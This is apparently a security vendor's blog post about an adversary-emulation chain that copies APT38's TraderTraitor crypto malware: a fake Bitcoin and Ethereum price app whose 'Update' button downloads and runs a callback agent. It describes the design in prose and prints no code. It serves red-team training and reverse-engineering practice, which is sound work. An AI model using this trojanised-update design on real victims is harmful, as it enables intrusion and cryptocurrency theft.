TTP Tuesday: APT38 CryptoSpy
We are just off the heels of last week’s chain that replicated WannaCry. This week we are looking at APT38’s crypto attacks. You can replicate many things, but replicating an entire blockchain seemed a little extreme. This week’s chain concentrates more on the way initial access was gained according to cisa.gov.
Anytime I see a way for me to write something custom, I like to take advantage of the situation. So just because this chain might not have a lot of TTPs, it doesn’t mean there isn’t a lot going on in the background. According to CISA, the government refers to the malware used by APT38 in these attacks as “TraderTraitor”. The malware is an electron-based nodeJS application, like Operator just minus the malware part😜.
Nothing fancy, just an application that looks like it is giving you the most recent prices for Bitcoin and Ethereum, then asks if you would like to update. This is done to fit the next part of the CISA report: “Within the code is a function that purports to be an update, with a name such as UpdateCheckSync(), that downloads and executes a malicious payload”. In our case, the malicious payload is a pneuma agent which gets downloaded and launched once you click the “Update” button.
The malware will check for a file called “config.json” in the same directory as the binary. If a “config.json” file is not found, the malware will fall back to parsing its binary name (similar to the technique used in the Goldilocks chain). This will use that data to download pneuma from a Redirector or your Operator instance and attempt to connect back to that same IP (to keep complexity at a minimum, we are using Operator’s default ports).
Some new techniques in Operator
The final 2 TTPs are utilizing some less seen techniques in Operator. After hosting the link to the CryptoSpy binary, we immediately start asking Operator if our expected CryptoSpy (pneuma) agent has called back successfully. When the CryptoSpy agent calls back in, the last TTP will then queue an identification TTP to check the username and groups of the user. These TTPs will be released in a more generic form, enabling them to be easily added to your own chains. This will allow you to specify the name of the expected agent and the ID of the TTP you would like to queue.
Check it out on the Prelude chains website.
Watch a demonstration:
Feeling a bit more adventurous?
The malware’s update function is named the same as in the CISA report. Try throwing it in a reverse engineering tool (like Ghidra) to see if you can follow the information flow! Everything in the binary should be pretty straightforward and might give you the opportunity to get your feet wet with some basic reverse engineering.
A few questions you might want to try and answer are:
How does the price update?
Can you find the two functions that are used to identify the callback IP?
What are some of the strings embedded in the binary?
Staying up to date
Thanks for reading our latest TTP Tuesday release! Please subscribe and reach out with any feedback. We love to hear from our community!
There are several ways to follow us and learn more about Prelude and our team members:
Get our products
Download Prelude Operator: https://www.prelude.org/download/current
See the latest kill chain and TTP Releases: https://chains.prelude.org/
See our open-source repositories: https://github.com/preludeorg
Join our community
Read, watch, and listen
Listen to our Podcast: https://anchor.fm/preludeorg
Read our blog: https://feed.prelude.org
Watch our live streams: https://www.twitch.tv/preludeorg
Watch our pre-recorded content: https://www.youtube.com/c/preludeorg